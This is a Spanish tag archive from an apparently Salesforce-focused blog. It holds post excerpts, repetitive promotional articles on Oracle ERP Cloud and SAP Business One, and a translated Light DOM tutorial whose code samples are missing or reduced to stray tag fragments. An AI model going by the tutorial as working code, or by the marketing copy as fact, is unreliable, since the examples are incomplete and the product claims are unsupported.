Skip to content

Etiqueta: documentación

El gran debate sobre las fuentes de clientes potenciales de Salesforce

Como la mayoría de los administradores de Salesforce, paso mucho tiempo en reuniones. De hecho, paso más tiempo en reuniones hablando sobre Salesforce que trabajando en Salesforce. Uno de los temas que surge en cada cliente, independientemente del tamaño de la empresa, es Lead Source. Lead Source es un […]

estándar

The post El gran debate sobre Lead Source de Salesforce appeared first on Salesforce Ben.

El gran debate sobre Lead Source de Salesforce appeared first on Salesforce Ben

Seguir leyendo

Los 5 sombreros de un consultor de Salesforce

Un consultor de Salesforce no es sólo un experto técnico que ayuda a crear flujos y ejecutar informes. Vamos más allá, y nos corresponde adoptar la posición de asesor empresarial de confianza y socio estratégico.  Nuestra experiencia como consultor debe ir más allá de conocer Salesforce al dedillo. También debemos ser conscientes de […]

The post Los 5 sombreros de un consultor de Salesforce appeared first on Salesforce Ben.

Los 5 sombreros de un consultor de Salesforce appeared first on Salesforce Ben

Seguir leyendo

Mejore su experiencia MuleSoft con IA ☁️

Mejore su experiencia MuleSoft con IA ☁️

En el mundo de la IA, que se desarrolla rápidamente, MuleSoft está evolucionando sus capacidades de integración, gestión de API e IA.

En el mundo de la IA, MuleSoft está evolucionando sus capacidades de integración, gestión de API e IA

The post Acelere su viaje a MuleSoft con IA appeared first on Blog de Desarrolladores de Salesforce.

Seguir leyendo

Cómo crear un proceso de ventas que consiga acuerdos en todo momento

Aprenda los pasos correctos desde la investigación hasta el cierre, y perfeccione las estrategias que aumentan las tasas de éxito.

Seguir leyendo

Dentro de la investigación en IA: Superar los retos para impulsar nuevas innovaciones

Por Yingbo Zhou y Scott Nyberg En nuestra serie «Engineering Energizers» Q&A, examinamos las experiencias profesionales que han formado a los líderes de ingeniería de Salesforce. Conozca a Yingbo Zhou, Director Senior de Investigación de Salesforce AI Research, donde dirige su equipo para hacer avanzar la IA, centrándose en los campos del procesamiento del lenguaje natural y el software […]

La experiencia de Yingbo Zhou en el campo de la inteligencia artificial es una de las claves de su éxito

El post Inside AI Research: Conquering Complex Challenges to Power Next Generation Innovations appeared first on Blog de ingeniería de Salesforce.

La investigación de la IA desde dentro: Cómo superar retos complejos para impulsar la próxima generación de innovaciones

Seguir leyendo

¿Por qué es importante la IA generativa para las empresas?

Los expertos en IA de Salesforce analizan seis áreas en las que la IA generativa tendrá un gran impacto en el mundo empresarial.

Seguir leyendo

5 usos creativos de DataWeave de MuleSoft: Desencadenar la magia de la transformación ☁️

5 usos creativos de DataWeave de MuleSoft: Desencadenar la magia de la transformación ☁️

Recorre una lista de herramientas para utilizar DataWeave en diferentes escenarios, desde una aplicación de Mule con arrastrar y soltar hasta una herramienta de línea de comandos.

The post 5 Maneras de Usar el Mágico Lenguaje de Transformación de MuleSoft’s: DataWeave appeared first on Blog de desarrolladores de Salesforce.

Seguir leyendo

El poder cada vez mayor de los modelos pequeños

La reciente cobertura mediática de la IA ha seguido un patrón familiar: se lanza un nuevo modelo masivo, que se da a conocer a los beta testers y, finalmente, al público, pero apenas pasan uno o dos meses antes de que empiecen a surgir rumores sobre el modelo aún mayor que supuestamente se está formando para sustituirlo.

La IA se ha convertido en una de las tecnologías más populares del mundo

Seguir leyendo

Aceptar el cambio: Una historia de transformación profesional y posibilidades

La trayectoria de Marzena está marcada por una búsqueda incesante del conocimiento, el equilibrio entre el trabajo a tiempo completo y la crianza de los hijos. Más información aquí.

El post Abrazar el cambio: A Tale of Professional Transformation & Possibilities appeared first on Blog de Salesforce EU.

La historia de Marzena sobre la transformación profesional y las posibilidades appeared first on Blog de Salesforce EU.

Seguir leyendo

30 preguntas y respuestas de entrevistas a analistas de negocio

La demanda de analistas de negocio de Salesforce ha crecido a un ritmo elevado. Las organizaciones de Salesforce han evolucionado y se han vuelto más complejas. Como resultado, existe una mayor necesidad de evaluar los cambios deseados y obtener una visión completa de la situación, para asegurarse de que todo el mundo está de acuerdo. Esta es la razón por la que las organizaciones deben buscar […]

El post 30 Business Analyst Interview Questions & Answers appeared first on Salesforce Ben.

Seguir leyendo

Lista de comprobación de implementación de Salesforce: De la puesta en marcha a la adopción

Las implementaciones de Salesforce, también conocidas como ‘releases’, son uno de los mayores retos para los administradores, consultores y aquellos que trabajan en otras muchas funciones. A medida que las organizaciones de Salesforce se vuelven cada vez más complejas, los cambios suelen tener muchas partes «móviles» que pueden tener repercusiones de gran alcance en la organización de Salesforce. Una vez que esté satisfecho con la solución que ha construido (en un sandbox) […]

The post Lista de comprobación de la implementación de Salesforce: De la puesta en marcha a la adopción appeared first on Salesforce Ben.

Seguir leyendo

Marco para el diseño de soluciones Salesforce para equipos empresariales de comercialización

Introducirse en una nueva organización por primera vez puede ser casi como embarcarse en un viaje a través del mar oscuro durante la temporada de tormentas. Esto es especialmente cierto en un entorno empresarial que tiene cientos o miles de usuarios utilizados por múltiples grupos de partes interesadas que tienen su propia pila tecnológica integrada en Salesforce. He […]

El post Marco para el diseño de soluciones Salesforce para equipos empresariales de lanzamiento al mercado appeared first on Salesforce Ben.

Seguir leyendo

Guía completa de documentación de Salesforce (en un mundo de inteligencia artificial)

La plataforma Salesforce es muy potente. Con cada nueva versión, su org se vuelve más potente, pero también más compleja. Como le dijeron una vez a Spiderman: «un gran poder conlleva una gran responsabilidad». Entonces, ¿cómo puede asumir la responsabilidad real de mantener su organización? Con todo lo demás que tiene que hacer, documentar sus cambios es probablemente bajo en […]

El post Guía completa para la documentación de Salesforce (en un mundo de IA) appeared first on Salesforce Ben.

Seguir leyendo

5 razones por las que necesita un diccionario de datos de Salesforce

Desde el temor a las imprecisiones en los informes hasta la lucha constante contra los silos de datos y la sombra amenazadora de los incumplimientos, los retos de supervisar sus datos son abundantes. Y no hablemos ya de los quebraderos de cabeza financieros que provocan las malas prácticas de gestión de datos. Mantener un diccionario de datos no es solo marcar una casilla […]

The post 5 razones por las que necesita un diccionario de datos de Salesforce appeared first on Salesforce Ben.

Las razones por las que necesita un diccionario de datos de Salesforce appeared first on Salesforce Ben

Seguir leyendo

¿Por qué Oracle ERP Cloud es la mejor opción para tu negocio? Conoce sus beneficios

Introducción:
Oracle ERP Cloud es una solución de gestión empresarial en la nube que ofrece una amplia gama de herramientas para mejorar la eficiencia y la productividad de tu negocio. En este artículo, te explicaremos qué es Oracle ERP Cloud, cómo funciona y cómo puede ayudarte a gestionar mejor tu empresa.

1. ¿Qué es Oracle ERP Cloud y cómo funciona?

Oracle ERP Cloud es una solución de gestión empresarial en la nube que combina diferentes módulos para gestionar todas las áreas de tu negocio, como finanzas, recursos humanos, cadena de suministro, ventas y marketing, entre otros. Estos módulos están integrados entre sí, lo que permite una gestión más eficiente y una visión global de tu empresa.

La nube de Oracle ERP Cloud funciona a través de una plataforma segura y confiable que almacena todos los datos y procesos de tu empresa. Esto significa que no necesitas invertir en infraestructura de TI costosa y puedes acceder a la plataforma desde cualquier lugar y en cualquier momento, siempre que tengas una conexión a Internet.

2. La seguridad de Oracle ERP Cloud: ¿por qué es importante para tu negocio?

La seguridad es una preocupación importante para cualquier empresa, especialmente cuando se trata de gestionar datos confidenciales y críticos. Oracle ERP Cloud ofrece una solución segura y confiable para tu negocio, ya que cuenta con medidas de seguridad avanzadas para proteger tus datos.

La plataforma de Oracle ERP Cloud utiliza tecnología de encriptación para proteger los datos en tránsito y en reposo, lo que garantiza que solo las personas autorizadas puedan acceder a ellos. Además, Oracle realiza regularmente auditorías de seguridad y cumple con los estándares y regulaciones más estrictos de la industria.

3. Oracle ERP Cloud y su capacidad para adaptarse a las necesidades de tu empresa

Cada empresa es única y tiene necesidades específicas. Oracle ERP Cloud ofrece una solución altamente personalizable que se puede adaptar a las necesidades de tu empresa. Puedes personalizar los módulos y las funcionalidades según tus requerimientos y agregar o eliminar características según sea necesario.

Además, Oracle ERP Cloud es escalable, lo que significa que puede crecer junto con tu empresa. A medida que tu negocio se expande, puedes agregar más usuarios y funcionalidades sin problemas. Esto te permite tener un sistema de gestión empresarial flexible y adaptable a medida que tu empresa evoluciona.

4. ¿Cómo Oracle ERP Cloud puede mejorar la eficiencia y la productividad de tu negocio?

Oracle ERP Cloud ofrece una serie de herramientas y funcionalidades que pueden mejorar la eficiencia y la productividad de tu negocio. Una de las principales ventajas de Oracle ERP Cloud es la automatización de procesos. Puedes automatizar tareas repetitivas y manuales, lo que te permite ahorrar tiempo y recursos.

Además, Oracle ERP Cloud te proporciona una visión en tiempo real de todos los aspectos de tu negocio. Puedes acceder a informes y análisis actualizados en tiempo real, lo que te permite tomar decisiones más informadas y basadas en datos. Esto te ayuda a optimizar tus operaciones y a identificar áreas de mejora.

5. La integración de Oracle ERP Cloud con otras aplicaciones empresariales

Oracle ERP Cloud se integra fácilmente con otras aplicaciones empresariales, lo que te permite tener una solución completa y personalizada para tu negocio. Puedes integrar Oracle ERP Cloud con aplicaciones de CRM, gestión de proyectos, gestión de inventario y muchas otras, lo que te permite tener una visión global de tu empresa y una gestión más eficiente.

La integración de Oracle ERP Cloud con otras aplicaciones también te permite compartir datos y procesos entre diferentes departamentos de tu empresa, lo que mejora la colaboración y la comunicación interna.

6. ¿Cómo Oracle ERP Cloud puede ayudarte a tomar mejores decisiones empresariales?

Oracle ERP Cloud recopila y analiza datos en tiempo real, lo que te permite tomar decisiones más informadas y basadas en datos. Puedes acceder a informes y análisis actualizados en tiempo real, lo que te proporciona una visión completa de tu empresa y te ayuda a identificar tendencias y patrones.

Además, Oracle ERP Cloud ofrece herramientas de análisis avanzadas que te permiten realizar pronósticos y simulaciones, lo que te ayuda a tomar decisiones estratégicas a largo plazo. Puedes analizar diferentes escenarios y evaluar el impacto de tus decisiones antes de implementarlas.

7. La facilidad de implementación de Oracle ERP Cloud y su impacto en tu negocio

La implementación de un sistema de gestión empresarial puede ser un proceso complicado y costoso. Sin embargo, Oracle ERP Cloud ofrece una implementación rápida y sencilla, lo que minimiza el impacto en tu negocio.

Oracle ERP Cloud utiliza una metodología de implementación ágil que te permite empezar a utilizar el sistema en poco tiempo. Además, Oracle ofrece soporte y asistencia técnica durante todo el proceso de implementación, lo que garantiza que todo funcione sin problemas.

8. Oracle ERP Cloud y su capacidad para gestionar múltiples ubicaciones y divisas

Si tu empresa tiene múltiples ubicaciones o opera en diferentes países, Oracle ERP Cloud puede gestionar fácilmente esta complejidad. Puedes gestionar diferentes ubicaciones y divisas en un solo sistema, lo que te proporciona una visión global de tu empresa y una gestión más eficiente.

Además, Oracle ERP Cloud ofrece herramientas de gestión de divisas y tasas de cambio, lo que te permite realizar transacciones en diferentes monedas y mantener un control preciso de tus operaciones internacionales.

9. ¿Cómo Oracle ERP Cloud puede ayudarte a cumplir con las regulaciones y normativas?

Cada industria y país tiene regulaciones y normativas específicas que las empresas deben cumplir. Oracle ERP Cloud ofrece herramientas y funcionalidades que te ayudan a cumplir con estas regulaciones y normativas.

Por ejemplo, Oracle ERP Cloud te permite generar informes y documentación necesarios para cumplir con los requisitos legales y fiscales. Además, Oracle realiza regularmente actualizaciones y mejoras para asegurarse de que su plataforma cumpla con los estándares más recientes.

10. La importancia del soporte y la asistencia técnica en Oracle ERP Cloud para el éxito de tu negocio.

El soporte y la asistencia técnica son fundamentales para el éxito de cualquier sistema de gestión empresarial. Oracle ERP Cloud ofrece soporte y asistencia técnica las 24 horas del día, los 7 días de la semana, lo que te garantiza que siempre tendrás ayuda cuando la necesites.

Además, Oracle cuenta con una amplia red de socios y consultores certificados que pueden brindarte asesoramiento y soporte adicional. Puedes acceder a recursos de aprendizaje en línea, documentación y comunidades de usuarios para obtener más información y resolver cualquier problema que puedas tener.

Conclusión:
En conclusión, Oracle ERP Cloud es una solución de gestión empresarial en la nube que ofrece una amplia gama de herramientas para mejorar la eficiencia y la productividad de tu negocio. Esperamos que este artículo te haya ayudado a entender mejor qué es Oracle ERP Cloud, cómo funciona y cómo puede ayudarte a gestionar mejor tu empresa. Con Oracle ERP Cloud, puedes automatizar procesos, tomar decisiones basadas en datos, cumplir con regulaciones y normativas, y gestionar múltiples ubicaciones y divisas. Además, Oracle ofrece soporte y asistencia técnica para garantizar el éxito de tu negocio. No dudes en considerar Oracle ERP Cloud para mejorar la gestión de tu empresa.
Encontrar la solución ERP adecuada para tu negocio puede ser un desafío, pero Oracle ERP Cloud ofrece una serie de ventajas y desventajas que debes considerar. Si estás interesado en conocer más sobre este tema, te recomendamos leer el artículo «Oracle ERP Cloud: Ventajas y Desventajas» en el sitio web de EGA Futura. Este artículo te brindará información detallada sobre las características y beneficios de Oracle ERP Cloud, así como también las posibles limitaciones que debes tener en cuenta. ¡No te lo pierdas! Leer más

SAP Business One: la herramienta esencial para una gestión eficiente de tu cadena de suministro

Introducción

SAP Business One es una solución de software de gestión empresarial diseñada específicamente para pequeñas y medianas empresas. Esta plataforma integral ofrece una amplia gama de funciones y características que pueden ayudar a las empresas a optimizar y mejorar su gestión de la cadena de suministro. Desde la planificación de la demanda hasta la gestión de inventario y la colaboración con socios comerciales, SAP Business One ofrece herramientas y capacidades que pueden mejorar la eficiencia y la productividad en toda la cadena de suministro.

¿Qué es SAP Business One y cómo puede ayudar a tu empresa?

SAP Business One es un sistema de gestión empresarial que integra todas las áreas de una empresa en una sola plataforma. Esta solución ofrece una amplia gama de funciones y características que pueden ayudar a las empresas a gestionar eficientemente su cadena de suministro. Algunas de las características clave de SAP Business One incluyen la gestión de inventario, la planificación de la demanda, la gestión de compras y proveedores, la integración con otras herramientas de gestión de la cadena de suministro, y la capacidad de cumplir con los requisitos de cumplimiento normativo.

Los beneficios de implementar SAP Business One en la gestión de la cadena de suministro.

La implementación de SAP Business One en la gestión de la cadena de suministro puede proporcionar una serie de beneficios significativos para las empresas. En primer lugar, esta solución puede mejorar la eficiencia y la productividad al automatizar y agilizar los procesos en toda la cadena de suministro. Esto puede ayudar a reducir los costos operativos y mejorar la rentabilidad de la empresa.

Además, SAP Business One ofrece una mejor gestión de inventario, lo que permite a las empresas tener un control más preciso sobre sus existencias. Esto puede ayudar a evitar la falta de existencias o el exceso de inventario, lo que puede resultar en pérdidas financieras. Con SAP Business One, las empresas pueden realizar un seguimiento en tiempo real de su inventario y realizar ajustes según sea necesario.

Otro beneficio importante de implementar SAP Business One en la gestión de la cadena de suministro es la mejora de la visibilidad y el control sobre la cadena de suministro. Esta solución proporciona información en tiempo real sobre el estado de los pedidos, las entregas y los envíos, lo que permite a las empresas tomar decisiones más informadas y responder rápidamente a los cambios en la demanda o en las condiciones del mercado.

Cómo SAP Business One puede mejorar la visibilidad y el control de tu cadena de suministro.

Una de las principales ventajas de utilizar SAP Business One en la gestión de la cadena de suministro es la capacidad de realizar un seguimiento en tiempo real del inventario y los envíos. Esta solución proporciona información actualizada sobre el estado de los pedidos, las entregas y los envíos, lo que permite a las empresas tener una visión clara de su cadena de suministro en todo momento. Esto puede ayudar a evitar retrasos en la entrega y garantizar una gestión eficiente de los recursos.

Además, SAP Business One mejora la comunicación con proveedores y clientes a través de su capacidad de integración con otras herramientas de gestión de la cadena de suministro. Esta integración permite a las empresas compartir información y colaborar de manera más efectiva, lo que puede ayudar a agilizar los procesos y mejorar la satisfacción del cliente.

Otra forma en que SAP Business One puede mejorar la visibilidad y el control de la cadena de suministro es a través de sus capacidades de pronóstico y planificación. Esta solución utiliza algoritmos avanzados y datos históricos para predecir la demanda futura y ayudar a las empresas a planificar sus operaciones de manera más eficiente. Esto puede ayudar a evitar la falta de existencias o el exceso de inventario, lo que puede resultar en pérdidas financieras.

La importancia de la planificación de la demanda en la gestión de la cadena de suministro y cómo SAP Business One puede ayudar.

La planificación de la demanda es un aspecto crítico de la gestión de la cadena de suministro, ya que permite a las empresas anticipar y responder a las fluctuaciones en la demanda de los clientes. Una planificación de la demanda efectiva puede ayudar a evitar la falta de existencias o el exceso de inventario, lo que puede resultar en pérdidas financieras.

SAP Business One ofrece herramientas y capacidades que pueden ayudar a las empresas a mejorar su planificación de la demanda. Esta solución utiliza algoritmos avanzados y datos históricos para predecir la demanda futura y ayudar a las empresas a planificar sus operaciones de manera más eficiente. Además, SAP Business One permite a las empresas realizar un seguimiento en tiempo real de la demanda y ajustar sus operaciones según sea necesario.

Al utilizar SAP Business One para la planificación de la demanda, las empresas pueden mejorar la eficiencia y la productividad al evitar la falta de existencias o el exceso de inventario. Esto puede ayudar a reducir los costos operativos y mejorar la rentabilidad de la empresa.

Cómo SAP Business One puede optimizar la gestión de inventario y reducir costos en la cadena de suministro.

La gestión de inventario es un desafío importante en la cadena de suministro, ya que implica mantener un equilibrio entre tener suficiente inventario para satisfacer la demanda de los clientes y evitar el exceso de inventario que puede resultar en pérdidas financieras.

SAP Business One puede ayudar a optimizar la gestión de inventario al proporcionar una visibilidad en tiempo real del inventario y las existencias. Esta solución permite a las empresas realizar un seguimiento de las existencias en tiempo real y realizar ajustes según sea necesario. Además, SAP Business One utiliza algoritmos avanzados y datos históricos para predecir la demanda futura y ayudar a las empresas a planificar sus operaciones de manera más eficiente.

Al utilizar SAP Business One para la gestión de inventario, las empresas pueden reducir los costos operativos al evitar la falta de existencias o el exceso de inventario. Esto puede ayudar a mejorar la rentabilidad de la empresa y garantizar una gestión eficiente de los recursos.

Cómo SAP Business One puede mejorar la eficiencia en la gestión de compras y proveedores.

La gestión de compras y proveedores es otro aspecto crítico de la cadena de suministro, ya que implica la adquisición de materias primas y productos terminados de proveedores externos. Una gestión eficiente de compras y proveedores puede ayudar a las empresas a reducir los costos y mejorar la calidad de los productos.

SAP Business One puede mejorar la eficiencia en la gestión de compras y proveedores al proporcionar una visibilidad en tiempo real de los pedidos y las entregas. Esta solución permite a las empresas realizar un seguimiento de los pedidos en tiempo real y recibir notificaciones automáticas sobre el estado de los pedidos. Además, SAP Business One mejora la comunicación con proveedores a través de su capacidad de integración con otras herramientas de gestión de la cadena de suministro.

Al utilizar SAP Business One para la gestión de compras y proveedores, las empresas pueden mejorar la eficiencia y la productividad al agilizar los procesos y reducir los tiempos de entrega. Esto puede ayudar a reducir los costos operativos y mejorar la rentabilidad de la empresa.

La integración de SAP Business One con otras herramientas de gestión de la cadena de suministro.

La integración es un aspecto clave de la gestión de la cadena de suministro, ya que implica la conexión y el intercambio de información entre diferentes sistemas y herramientas. Una integración efectiva puede ayudar a las empresas a agilizar los procesos y mejorar la eficiencia en toda la cadena de suministro.

SAP Business One ofrece capacidades de integración que permiten a las empresas conectar y compartir información con otras herramientas de gestión de la cadena de suministro. Esta integración puede ayudar a mejorar la comunicación y la colaboración con socios comerciales, lo que puede resultar en una gestión más eficiente de la cadena de suministro.

Al utilizar SAP Business One para la integración, las empresas pueden mejorar la eficiencia y la productividad al agilizar los procesos y reducir los tiempos de entrega. Esto puede ayudar a reducir los costos operativos y mejorar la rentabilidad de la empresa.

Cómo SAP Business One puede ayudar a tu empresa a cumplir con los requisitos de cumplimiento normativo en la cadena de suministro.

El cumplimiento normativo es un aspecto crítico de la gestión de la cadena de suministro, ya que implica cumplir con las regulaciones y normas establecidas por las autoridades gubernamentales y los organismos reguladores. El incumplimiento de estas regulaciones puede resultar en sanciones financieras y dañar la reputación de la empresa.

SAP Business One puede ayudar a las empresas a cumplir con los requisitos de cumplimiento normativo al proporcionar herramientas y capacidades que permiten el seguimiento y la documentación de las actividades en la cadena de suministro. Esta solución permite a las empresas generar informes y registros que demuestran el cumplimiento de las regulaciones y normas establecidas.

Al utilizar SAP Business One para el cumplimiento normativo, las empresas pueden reducir el riesgo de sanciones financieras y proteger su reputación. Esto puede ayudar a mejorar la rentabilidad de la empresa y garantizar una gestión eficiente de los recursos.

Cómo SAP Business One puede mejorar la colaboración con socios comerciales en la cadena de suministro.

La colaboración con socios comerciales es un aspecto crítico de la gestión de la cadena de suministro, ya que implica trabajar de manera conjunta con proveedores, distribuidores y otros socios para garantizar una gestión eficiente de los recursos y satisfacer las demandas de los clientes.

SAP Business One puede mejorar la colaboración con socios comerciales al proporcionar herramientas y capacidades que permiten compartir información y colaborar de manera más efectiva. Esta solución permite a las empresas compartir información en tiempo real sobre el estado de los pedidos, las entregas y los envíos, lo que facilita la toma de decisiones y la respuesta rápida a los cambios en la demanda o en las condiciones del mercado.

Al utilizar SAP Business One para la colaboración con socios comerciales, las empresas pueden mejorar la eficiencia y la productividad al agilizar los procesos y reducir los tiempos de entrega. Esto puede ayudar a reducir los costos operativos y mejorar la rentabilidad de la empresa.

Cómo SAP Business One puede ayudar a tu empresa a adaptarse a los cambios y desafíos en la cadena de suministro.

La cadena de suministro está sujeta a cambios y desafíos constantes, como cambios en la demanda de los clientes, fluctuaciones en los precios de las materias primas y cambios en las regulaciones gubernamentales. Las empresas deben ser capaces de adaptarse rápidamente a estos cambios y desafíos para mantener su competitividad en el mercado.

SAP Business One puede ayudar a las empresas a adaptarse a los cambios y desafíos en la cadena de suministro al proporcionar herramientas y capacidades que permiten una gestión ágil y flexible. Esta solución permite a las empresas realizar un seguimiento en tiempo real de la demanda y ajustar sus operaciones según sea necesario. Además, SAP Business One ofrece capacidades de pronóstico y planificación que pueden ayudar a las empresas a anticipar y responder a los cambios en la demanda y las condiciones del mercado.

Al utilizar SAP Business One para adaptarse a los cambios y desafíos en la cadena de suministro, las empresas pueden mejorar su competitividad en el mercado y garantizar una gestión eficiente de los recursos.

Conclusión

En resumen, SAP Business One es una solución de software de gestión empresarial que puede ayudar a las empresas a optimizar y mejorar su gestión de la cadena de suministro. Desde la planificación de la demanda hasta la gestión de inventario y la colaboración con socios comerciales, SAP Business One ofrece herramientas y capacidades que pueden mejorar la eficiencia y la productividad en toda la cadena de suministro.

Si tu empresa está buscando mejorar su gestión de la cadena de suministro, te recomendamos considerar la implementación de SAP Business One. Esta solución puede ayudar a mejorar la eficiencia y la productividad, reducir los costos operativos y mejorar la rentabilidad de la empresa. No pierdas la oportunidad de aprovechar los beneficios de SAP Business One para tu empresa.
Si estás buscando información sobre SAP Business One, te recomendamos leer nuestro artículo sobre «¿Qué es la financiación básica?» En este artículo, exploramos la importancia de contar con una financiación sólida para el crecimiento y desarrollo de tu empresa. Descubre cómo SAP Business One puede ayudarte a gestionar tus finanzas de manera eficiente y tomar decisiones estratégicas para impulsar el éxito de tu negocio. ¡No te lo pierdas! Leer más

Un día en la vida de un nuevo programador de Salesforce

Ingresar en el ecosistema de Salesforce puede ser una experiencia desalentadora pero emocionante. Hace poco más de un año, me incorporé a Giveclarity como consultor técnico en prácticas. Tras tres meses de formación, me adentré en el dinámico mundo de la consultoría. Como nuevo miembro del equipo técnico, me dedico a todo tipo de tareas, desde trabajar en […]

The post Un día en la vida de un nuevo codificador de Salesforce appeared first on Salesforce Ben.

Seguir leyendo

Salesforce Velocity con Sweep: Un nuevo estado de ánimo operativo

Salesforce Velocity con Sweep: Un nuevo estado de ánimo operativo

Última actualización el 25 de octubre de 2023 por Rakesh Gupta Salesforce es la plataforma CRM líder en el mundo por una razón: está en constante evolución e innovación, impulsando un crecimiento masivo en el ecosistema. El ecosistema de servicios y productos de Salesforce ha crecido significativamente en los últimos años. En 2021, IDC publicó un estudio en el que se

The post Salesforce Velocity con Sweep: A New Operational State of Mind appeared first on Campeón de la Automatización.

La velocidad de Salesforce con Sweep

Seguir leyendo

Salesforce Inspector Reloaded

Salesforce Inspector es una extensión de navegador (¡una gran noticia tanto para usuarios de Chrome como de Firefox!) que le permite interactuar fácilmente con los datos y navegar a las secciones de configuración de una forma más eficaz que la navegación estándar. Se trata de una solución esencial para ahorrar tiempo a todos los profesionales que trabajan con Salesforce. Este post entrará en los detalles […]

El post Salesforce Inspector Reloaded appeared first on Salesforce Ben.

Seguir leyendo

Desmitificando Light DOM y sus casos de uso ☁️

Desmitificando Light DOM y sus casos de uso ☁️

Esta es una traducción que desde EGA Futura ofrecemos como cortesía a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoamérica .

El enlace a la publicación original, lo encontrarás al final de este artículo.

Desmitificando Light DOM y sus casos de uso | Blog de desarrolladores de Salesforce

Light DOM es una función de Lightning Web Components que ha estado disponible de forma general en Lightning Experience, Experience Cloud, LWC OSS (código abierto) y todas las versiones de la aplicación móvil Salesforce desde Summer '23 .

Los componentes web Lightning, de forma predeterminada, se representan en DOM oculto , lo que proporciona una encapsulación y seguridad sólidas para sus componentes. Sin embargo, al mismo tiempo, evita el estilo global y bloquea las integraciones de terceros que introspeccionan el interior de sus componentes. Light DOM es una característica que se puede habilitar de forma granular en componentes seleccionados, de modo que Shadow DOM no los afecte.

¿Cómo funciona el DOM ligero?

Usemos un componente web Lightning muy simple como ejemplo.

holaCodey.html

<dx-code-block title language="html" code-block="

Hello Codey!

«>

holaCodey.js

En el ejemplo anterior, el DOM oculto predeterminado del componente evita que una regla CSS definida en el componente principal o el host alcance el elemento <p> . Además, no permite que el código JavaScript externo al componente consulte el elemento <p> mediante las API de consulta del navegador.

Para activar el DOM ligero para un componente, debe especificar el renderMode ligero en su archivo JavaScript y la directiva de plantilla lwc:render-mode en la etiqueta <template> del componente. Ambos cambios son necesarios debido a la forma en que se compilan los componentes web Lightning.

holaCodey.html

<dx-code-block title language="html" code-block="

Hello Codey!

«>

holaCodey.js

Cuando activa el DOM claro en un componente, el marcado del componente se adjunta al elemento anfitrión en lugar de a su árbol de sombra. Luego puede acceder al marcado desde otros componentes de la página como cualquier otro contenido en el host del documento que no esté protegido por Shadow DOM.

Los componentes DOM ligeros permiten el uso de API de consulta de navegador estándar como querySelector y querySelectorAll . En este caso, en lugar de usar this.template.querySelector , debes usar this.querySelector .

holaCodey.js

O más simplemente, a menudo puedes usar la directiva lwc:ref en ambos casos (componentes DOM sombreados y claros) y omitir el querySelector .

holaCodey.html

<dx-code-block title language="html" code-block="

Hello Codey!

«>

holaCodey.js

Cuándo usarlo y cuándo no usarlo

Light DOM es una opción para cada componente individual. Sus efectos no se aplicarán a otros componentes a menos que también opten por participar. Tenga en cuenta que los componentes base siempre se representan en DOM oculto.

Recomendamos habilitar DOM ligero si tiene bibliotecas que necesitan acceder a los componentes internos mediante API de consulta de navegador estándar, aplicar estilos globales o necesita más flexibilidad para implementar las mejores prácticas de accesibilidad, siempre y cuando el componente no exponga datos confidenciales. Cubriremos estos casos de uso con más profundidad en la siguiente sección.

No recomendamos habilitar DOM ligero para un componente si ese componente aparece o funciona con datos confidenciales. El uso de DOM ligero elimina la encapsulación de DOM en sombra y expone los componentes al raspado de DOM. Por lo tanto, tenga en cuenta esta importante consideración.

Casos de uso habilitados por DOM ligero

Light DOM permite varios casos de uso que anteriormente no eran compatibles.

1) Soporte de bibliotecas que necesitan acceso a las partes internas de un componente

Light DOM permite el uso de bibliotecas que necesitan acceso a los componentes internos. Un buen ejemplo de esto son las bibliotecas de análisis utilizadas en los sitios de Experience Cloud, como Google Analytics, ya que necesitan acceso a los componentes internos para obtener mejores resultados.

Podemos probar este caso de uso, incluido el componente helloCodey anterior, en un componente principal mascotChanger de la siguiente manera.

mascotChanger.html

<dx-code-block title language="html" code-block="
«>

mascotChanger.js

Tenga en cuenta que, aunque el párrafo consultado pertenece al componente helloCodey , podemos acceder a él con this.template.querySelector , porque pertenece al DOM ligero secundario. Sin embargo, si el componente helloCodey no tuviera habilitado el DOM ligero, querySelector habría devuelto null .

También puede acceder a los componentes internos del DOM ligero desde un script que se carga como un recurso estático en la página, siempre y cuando todos los componentes ancestros estén habilitados para el DOM ligero. Por ejemplo, en un sitio LWR Experience Cloud, que es DOM completamente ligero, puede agregar un recurso estático de JavaScript que encuentre los componentes internos helloCodey de la siguiente manera.

myJSResource.js

2) Implementación más sencilla de componentes profundamente anidados

Otro ejemplo en el que esto puede resultar útil es implementar componentes complejos y profundamente anidados. En ese caso, es posible que prefiera tener un único componente DOM de sombra en el nivel superior y componentes DOM claros dentro para evitar gastos generales. Por ejemplo, un componente de tabla de datos personalizado puede tener solo un gran componente DOM de sombra alrededor de todo, en lugar de una sombra para cada fila y celda de la tabla.

Esta implementación facilita la consulta de sus propios elementos desde el componente de nivel superior de su jerarquía y también la implementación de la accesibilidad. Además, hay una ligera mejora en el rendimiento en algunos casos de uso al usar DOM claro sobre DOM sombreado, lo que se debe principalmente a la sobrecarga de simplemente crear nodos de sombra adicionales.

3) Estilo global

Light DOM también facilita el estilo global, ya que permite que los estilos CSS caigan en cascada en el marcado del componente. Por ejemplo, un componente DOM ligero puede establecer un estilo que se carga y luego se aplica una vez para todos los componentes DOM ligeros de la página. La inyección de estilos globales a través de DOM ligero solo se admite en sitios de Experience Cloud, editor de contenido CMS o Sales Enablement.

Por ejemplo, definamos un componente colorChanger de la siguiente manera.

colorChanger.html

<dx-code-block title language="html" code-block="
«>

colorChanger.js

colorChanger.css

El color de fondo azul se aplicará a los párrafos de todas las instancias del componente helloCodey en la página, ya que está habilitado para DOM claro.

En la mayoría de los casos, no querrás que tu estilo se filtre a otros componentes. Eso todavía es posible para componentes DOM ligeros. Solo necesita colocar esas reglas de estilo en un archivo *.scoped.css , para que tengan como alcance el componente DOM ligero. El CSS con alcance está escrito exactamente igual que el CSS normal, pero solo se aplicará a ese componente sin filtrarse.

Tenga en cuenta que si las reglas de estilo se cargan globalmente como recursos estáticos en una página de Lightning Experience o un sitio de Experience Cloud, se les quitará el alcance y se aplicarán tanto a los componentes DOM claros como también a los componentes DOM de sombra, ya que la sombra sintética no evitará que se filtren. Esta es una limitación que se solucionará una vez que la sombra nativa sea totalmente compatible (actualmente en Developer Preview ). Cuando la sombra nativa está habilitada, solo los componentes habilitados para DOM claro heredarán los estilos globales.

4) Implementación más flexible de las mejores prácticas de accesibilidad

Light DOM permite que un componente haga referencia a la i d un elemento que vive en otro componente separado habilitado para Light DOM. Esto le permite vincular dos elementos utilizando los atributos i d y aria , lo que le otorga flexibilidad adicional para implementar las mejores prácticas de accesibilidad en sus proyectos. Mejoremos nuestro componente mascotChanger para demostrar esto.
